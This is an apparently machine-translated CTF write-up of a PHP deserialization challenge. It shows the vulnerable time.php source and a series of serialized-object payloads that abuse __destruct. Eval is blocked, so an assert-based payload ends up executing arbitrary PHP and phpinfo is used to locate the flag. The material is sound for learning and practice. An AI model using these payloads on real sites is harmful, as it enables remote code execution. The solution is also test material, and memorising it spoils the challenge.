WP

If there is any wrong , Also please correct me
Enter the target environment , Go through the process ：

1. Look at the source code

2. Manually try to access several common web page names ,

3. use dirsearch Scan website .

Find a link directly in the source code ：

<p> Millions of front-end NPU The time center tells you the time ：<a href="./time.php?source"></a></p>

visit /time.php?source, Now enter the subject gate , White box audit , It seems to be a relatively simple deserialization

White box code :

<?php
#error_reporting(0);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "Y-m-d h:i:s";
        $this->b = "date";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
$c = new HelloPhp;

if(isset($_GET['source']))
{
    highlight_file(__FILE__);
    die(0);
}

@$ppp = unserialize($_GET["data"]);

Try to construct payload

/time.php?data=O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:4:"eval";}

And then there's no then , Page echo “500, Unable to process request ”, I have no more , There's a filter , Then change the code , structure payload

/time.php?data=O:8:"HelloPhp":2:{s:1:"a";s:12:"var_dump(10)";s:1:"b";s:4:"eval";}

Same as before , Unable to process request , But var_dump() Generally speaking, it should not be filtered , May be eval Filtered , Switch to assert try

/time.php?data=O:8:"HelloPhp":2:{s:1:"a";s:12:"var_dump(10)";s:1:"b";s:6:"assert";}

success , Page echo int(10) 2021-04-07 12:39:47

hold var_dump(10) Switch to phpinfo(),（ Remember to change the size ）, very good ,phpinfo Not filtered , see disable_functions bar , It's filtered out system,exec,shell_exec

Try searching again flag,ohhhhhhhhhh, There are （ If this is empty … On the importance of good habits ）.

PS：assert from 7.2 Strings are no longer supported at first => Cannot perform PHP Code. （ This topic is in BUU On is PHP/7.0.33）